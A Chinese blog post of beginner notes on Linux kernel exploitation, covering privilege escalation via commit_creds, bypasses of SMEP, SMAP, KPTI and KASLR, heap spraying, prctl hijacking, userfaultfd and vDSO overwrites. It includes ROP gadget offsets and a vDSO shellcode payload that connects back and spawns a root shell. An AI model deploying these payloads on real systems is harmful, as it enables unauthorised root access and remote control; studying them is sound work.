Linux Kernel Exploit 入门笔记

笔者kernel pwn入门时的笔记,由于笔者接触kernel时间较短,难免出现错误….

Aim

int commit_creds(struct cred *new) 更改进程的cred.

commit_creds(prepare_kernel_cred(NULL));完成权限提升

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* subjective LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct group_info *group_info; /* supplementary groups for euid/fsgid */
/* RCU deletion */
union {
int non_rcu; /* Can we skip RCU deletion? */
struct rcu_head rcu; /* RCU deletion hook */
};
} __randomize_layout;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/*
* The initial credentials for the initial task
*/
struct cred init_cred = {
.usage = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
.subscribers = ATOMIC_INIT(2),
.magic = CRED_MAGIC,
#endif
.uid = GLOBAL_ROOT_UID,
.gid = GLOBAL_ROOT_GID,
.suid = GLOBAL_ROOT_UID,
.sgid = GLOBAL_ROOT_GID,
.euid = GLOBAL_ROOT_UID,
.egid = GLOBAL_ROOT_GID,
.fsuid = GLOBAL_ROOT_UID,
.fsgid = GLOBAL_ROOT_GID,
.securebits = SECUREBITS_DEFAULT,
.cap_inheritable = CAP_EMPTY_SET,
.cap_permitted = CAP_FULL_SET,
.cap_effective = CAP_FULL_SET,
.cap_bset = CAP_FULL_SET,
.user = INIT_USER,
.user_ns = &init_user_ns,
.group_info = &init_groups,
.ucounts = &init_ucounts,
};

Linux 6.2后取消prepare_kernel_cred(NULL)得到init_cred的方式.

1
2
3
4
5
6
7
8
9
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
...
if (daemon)
old = get_task_cred(daemon);
else
old = get_cred(&init_cred);
...
}

Defense and bypass

SMEP/SMAP

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf?ref=hackernoon.com 4.6.1

用户空间代码无法执行/用户空间地址无法访问
两种保护分别通过CR4寄存器上的20,21位使能.Linux5.1之前能关,用native_write_cr4(value)设置一下就行.之后这两位被固定了.
https://www.phoronix.com/news/Linux-Protect-Special-CR4-Bits

With a new patch now pending in the tip tree ahead of the Linux 5.1 kernel cycle, the bits for SMEP and SMAP as well as UMIP are pinned so they can no longer be easily altered. UMIP meanwhile is the User-Mode Instruction Prevention feature to prevent execution of certain instructions in higher privilege levels and its behavior too is controlled via a CR4 bit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;

set_register:
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");

if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}

W/R (bit 1).
If the access causing the page-fault exception was a write, this flag is 1; otherwise, it is 0. This flag describes
the access causing the page-fault exception, not the access rights specified by paging.

U/S (bit 2)
If a user-mode access caused the page-fault exception, this flag is 1; it is 0 if a supervisor-mode access did so.
This flag describes the access causing the page-fault exception, not the access rights specified by paging.

If the U/S flag (bit 2) is 0 in at least one of the paging-structure
entries, the address is a supervisor-mode address. Otherwise, the address is a user-mode address.

I/D flag (bit 4).
This flag is 1 if (1) the access causing the page-fault exception was an instruction fetch; and (2) either
(a) CR4.SMEP = 1; or (b) both (i) CR4.PAE = 1 (either PAE paging or IA-32e paging is in use); and
(ii) IA32_EFER.NXE = 1. Otherwise, the flag is 0. This flag describes the access causing the page-fault
exception, not the access rights specified by paging

SMEP

管理模式执行保护,在内核页表中将所有用户空间页面标记为不可执行.防止直接修改返回地址到用户空间.可以在内核栈上ROP来绕过,溢出长度不够就栈迁移到用户空间.

重新映射页面权限是绕不了的:

我说它是内核地址不就绕了?不过感觉没啥实际意义

SMAP

管理模式访问保护,在内核页表中将用户空间页面标记为不可访问(不可读写),那就纯内核栈上ROP或者内核空间内栈迁移.

STAC一下能绕.

CR4.SMAP allows pages to be protected from supervisor-mode data accesses. If CR4.SMAP = 1, software operating
in supervisor mode cannot access data at linear addresses that are accessible in user mode. Software can override
this protection by setting EFLAGS.AC. Section 4.6 explains how access rights are determined, including the defini-
tion of supervisor-mode accesses and user-mode accessibility

可惜没有STAC的gadget,手动改CR4的SMAP的ROP链长度和提权差别不大了,没意义

KPTI

内核页表隔离.内核页表中有完整的用户地址空间和内核地址空间,用户页表中有完整的用户地址空间和a minimal set of kernel space address(异常处理入口点啥的).
防止一些侧信道的攻击手法泄露内核信息.同时KPTI在内核页表中将用户空间映射为不可执行.这意味着直接返回到用户态会触发用户级的SIGSEGV.

可以修改页表权限,切换回用户页表,注册用户级signal处理函数来正常返回用户态执行代码.
切换回用户页表:

1
2
3
mov     rdi, cr3
or rdi, 1000h
mov cr3, rdi

或者用现成的swapgs_restore_regs_and_return_to_usermode+22,布置好iret的frame就行

1
2
3
4
5
6
7
8
9
10
.text:FFFFFFFF81200F26                 mov     rdi, rsp
.text:FFFFFFFF81200F29 mov rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32 push qword ptr [rdi+30h]
.text:FFFFFFFF81200F35 push qword ptr [rdi+28h]
.text:FFFFFFFF81200F38 push qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B push qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E push qword ptr [rdi+10h]
.text:FFFFFFFF81200F41 push qword ptr [rdi]
.text:FFFFFFFF81200F43 push rax
.text:FFFFFFFF81200F44 jmp short loc_FFFFFFFF81200F89
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89 pop rax
.text:FFFFFFFF81200F8A pop rdi
.text:FFFFFFFF81200F8B call cs:off_FFFFFFFF82040088
.text:FFFFFFFF81200F91 jmp cs:off_FFFFFFFF82040080
...
.text.native_swapgs:FFFFFFFF8146D4E0 push rbp
.text.native_swapgs:FFFFFFFF8146D4E1 mov rbp, rsp
.text.native_swapgs:FFFFFFFF8146D4E4 swapgs
.text.native_swapgs:FFFFFFFF8146D4E7 pop rbp
.text.native_swapgs:FFFFFFFF8146D4E8 retn
...
.text:FFFFFFFF8120102E mov rdi, cr3
.text:FFFFFFFF81201031 jmp short loc_FFFFFFFF81201067
...
.text:FFFFFFFF81201067 or rdi, 1000h
.text:FFFFFFFF8120106E mov cr3, rdi
...
.text:FFFFFFFF81200FC7 iretq

swapgs作用
(ps: x86-64 架构下glibc使用FS来寻址TLS,GS不使用

KASLR/FG-KASLR

内核地址空间布局随机化.泄露个地址算基址就能绕.
FG-KASLR使偏移也随机化了,但是有不变的.
[text,text+0x400dc6] 可以找点gadget
swapgs_restore_regs_and_return_to_usermode 不变,可以正常返回用户态
ksymtab, starts at text+0xf85198 不变,可以找到commit_creds prepare_kernel_cred的地址.

构造个任意读即可:

1
2
3
4
unsigned long pop_rax_ret = image_base + 0x4d11UL; // pop rax; ret
unsigned long read_mem_pop1_ret = image_base + 0x4aaeUL; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
unsigned long pop_rdi_rbp_ret = image_base + 0x38a0UL; // pop rdi; pop rbp; ret;

1
2
3
4
5
struct kernel_symbol {
int value_offset;
int name_offset;
int namespace_offset;
};

SLAB_ACCOUNT

Linux 4.5版本引入,cred结构体由单独的kmem_cache分配

GFP_KERNEL_ACCOUNT

CONFIG_SLAB_FREELIST_RANDOM

开启后在每次取slub时会随机组织freelist.
slab在未开启random freelist时,是从高地址开始取堆块的. https://lwn.net/Articles/685047/
slub在未开启random freelist时,是从低地址开始取堆块的

CONFIG_SLAB_FREELIST_HARDENED

代码来自 Linux5.11.1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
struct kmem_cache
{
...
#ifdef CONFIG_SLAB_FREELIST_HARDENED
unsigned long random;
...
}

static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
/*
* When CONFIG_KASAN_SW/HW_TAGS is enabled, ptr_addr might be tagged.
* Normally, this doesn't cause any issues, as both set_freepointer()
* and get_freepointer() are called with a pointer with the same tag.
* However, there are some issues with CONFIG_SLUB_DEBUG code. For
* example, when __free_slub() iterates over objects in a cache, it
* passes untagged pointers to check_object(). check_object() in turns
* calls get_freepointer() with an untagged pointer, which causes the
* freepointer to be restored incorrectly.
*/
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}

Hardened Usercopy

Each call involves a user-space pointer and a kernel-space pointer; the user-space pointers are already checked in current kernels, so the patches only add tests for the kernel-space pointers. Those tests ensure that the address range doesn’t wrap past the end of memory, that the kernel-space pointer is not null, and that it does not point to a zero-length kmalloc() allocation (i.e. ZERO_OR_NULL_PTR() is false). Also, if the address range overlaps the kernel text (code) segment, it is rejected.

Beyond that, if the kernel-space address points into an object that has been allocated from the slab allocator, the patches ensure that what is being copied fits within the size of the object allocated. This check is performed by calling PageSlab() on the kernel address to see if it lies within a page that is handled by the slab allocator; it then calls an allocator-specific routine to determine whether the amount of data to be copied is fully within an allocated object. If the address range is not handled by the slab allocator, the patches will test that it is either within a single or compound page and that it does not span independently allocated pages.

In addition, for copies involving the stack, the copied range must fit within the current process’s stack. If there is architecture support for identifying stack frames, the copied range must fit within a single frame.

总结一下就是:

  1. 地址范围不能越过内存边界(wrap past the end of memory)
  2. 内核空间指针不为NULL
  3. 不允许指向 kmalloc 分配的零长度区域
  4. 地址范围不能与.text段重合
  5. 如果地址范围由slab管理,则地址范围需符合分配对象的大小
  6. (接5)否则地址范围不能跨越独立分配的页面.
  7. 如果涉及到栈则不允许超出当前进程的栈空间

以及一个副作用:

If usersize is non-zero (i.e., the cache is user-space accessible), this cache is not merged with any other cache on the system.This is a major downside from the exploitation perspective since all general-purpose caches are now marked as user-space accessible in create_boot_cache() where useroffset is set to 0 and usersize is the entire cache/object size. As a result, general-purpose caches are no longer mergeable with special-purpose caches. This is true even if CONFIG_HARDENED_USERCOPY is disabled!

总结

Technique

从内存任意读写到权限提升

堆喷射(Heap Spray)

固定堆布局

假设现在有一个堆溢出,但你目标要覆盖的对象不一定会分配到与能够发生溢出的对象前向(高地址)相邻的位置.(由于内核堆操作freelist杂乱或是开启了SLAB_FREELIST_RANDOM保护(默认开启)).
ps: 前提在同一个cache中

堆喷射:
先大量分配(spray)目标对象,清空原freelist(可选,个人见解).
分配发生溢出的对象.
大量喷射目标对象,使得目标对象并排放置,且有一个目标对象与发生溢出对象前向相邻.
最后正常溢出覆盖目标对象.

比如不断fork出新的进程,喷射cred结构再溢出覆盖完成提权(当然现在行不通了).
如何找到cred结构?PR_SET_NAME设置字符串,再在direct映射区搜索内存

1
2
3
4
PR_SET_NAME (since Linux 2.6.9)
Set the name of the calling thread, using the value in the location pointed to by (char *) arg2. The name can be up to 16 bytes long, including the terminating null byte. (If the
length of the string, including the terminating null byte, exceeds 16 bytes, the string is silently truncated.) This is the same attribute that can be set via pthread_setname_np(3)
and retrieved using pthread_getname_np(3). The attribute is likewise accessible via /proc/self/task/[tid]/comm, where tid is the name of the calling thread.

HijackPrctl

《New Reliable Android Kernel Root Exploitation Techniques》

一个内核的hook,且用户态可完整控制参数.
注意第一个参数是个int类型,可能不能完整传递64位数据.

1
2
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)

这种漏洞利用的原理在dong-hoon you(x86)分享的《New Reliable Android Kernel Root Exploitation Techniques》中提到,这种技术被用于安卓root,可以绕过PXN防御。

首先在用户执行prctl函数时,实际上是将全部参数传递给security_task_prctl函数(\kernel\sys.c 2075)

而security_task_prctl(\security\security.c)中通过hp->hook.task_prctl(option, arg2, arg3, arg4, arg5);将参数原封不动的传入hook进行处理,而这个hook位于内核的data段上,内核态有读写权限,因此可以通过修改这个位置劫持ptctl函数的执行流程:

call_usermodehelper

《New Reliable Android Kernel Root Exploitation Techniques》

1
int call_usermodehelper(char * path, char ** argv, char ** envp, int wait); 

call_usermodehelper,这个函数可以在内核中直接新建和运行用户空间程序,并且该程序具有root权限,因此只要将参数传递正确就可以执行任意命令(注意命令中的参数要用全路径,不能用相对路径)。

由于prctl第一个参数的截断,只能传递(四位的)用户态地址,在开启了SMAP的情况下需要通过这样的链子.

  1. mce_do_trigger –> call_usermodehelper
  2. poweroff_work_func –> run_cmd(poweroff_cmd) –> call_usermodehelper

提权变量总结

call_usermodehelper提权路径变量总结

userfaultfd

从强网杯 2021 线上赛题目 notebook 中浅析 userfaultfd 在 kernel pwn 中的利用
该技术主要用于条件竞争的控制,本质是利用错误处理来控制条件竞争的时序.linux5.11后需要root才能启用.可用FUSE达到相同效果.

比如这样一个条件竞争完成稳定uaf:
一个线程通过blob_get取得对象的读机会,在读的时候触发pagefault,进入错误处理,错误处理线程调用blob_del删除此对象,利用喷射完成堆布局,这个对象现在是一个tty结构,最后恢复执行,blob_get读取到tty结构

vDSO

《Bypassing SMEP Using vDSO Overwrites》

vDSO是虚拟的共享库,实际上是把内核地址空间的某代码段映射到用户空间,修改其中的导出函数如:

clock_gettime 0000000000000A10
gettimeofday 0000000000000C80
time 0000000000000DE0
getcpu 0000000000000E00
start 0000000000000940 [main entry]

可劫持调用代码的root或suid进程,完成提权(其实本来就是root,只是弹个shell)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
https://gist.github.com/itsZN/1ab36391d1849f15b785
"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb\x48\x39\xc3\x75\x0f\x48\x31\xc0\xb0\x39\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x09\x5b\x48\x31\xc0\xb0\x60\x0f\x05\xc3\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x97\x50\x48\xb9\xfd\xff\xf2\xfa\x80\xff\xff\xfe\x48\xf7\xd1\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x48\x31\xdb\x48\x39\xd8\x74\x07\x48\x31\xc0\xb0\xe7\x0f\x05\x90\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xd3\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0\xb0\xe7\x0f\x05";


nop
push rbx
xor rax,rax
mov al, 0x66
syscall #check uid
xor rbx,rbx
cmp rbx,rax
jne emulate

xor rax,rax
mov al,0x39
syscall #fork
xor rbx,rbx
cmp rax,rbx
je connectback

emulate:
pop rbx
xor rax,rax
mov al,0x60
syscall
retq

connectback:
xor rdx,rdx
pushq 0x1
pop rsi
pushq 0x2
pop rdi
pushq 0x29
pop rax
syscall #socket

xchg rdi,rax
push rax
mov rcx, 0xfeffff80faf2fffd
not rcx
push rcx
mov rsi,rsp
pushq 0x10
pop rdx
pushq 0x2a
pop rax
syscall #connect

xor rbx,rbx
cmp rax,rbx
je sh
xor rax,rax
mov al,0xe7
syscall #exit

sh:
nop
pushq 0x3
pop rsi
duploop:
pushq 0x21
pop rax
dec rsi
syscall #dup
jne duploop

mov rbx,0xff978cd091969dd0
not rbx
push rbx
mov rdi,rsp
push rax
push rdi
mov rsi,rsp
xor rdx,rdx
mov al,0x3b
syscall #execve
xor rax,rax
mov al,0xe7
syscall

参考文章,引文,图片来源

感谢各位师傅的文章,侵删
https://xz.aliyun.com/t/6296
https://xz.aliyun.com/t/3204
https://www.jianshu.com/p/07994f8b2bb0
https://www.jianshu.com/p/a2259cd3e79e
https://www.anquanke.com/post/id/253835

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信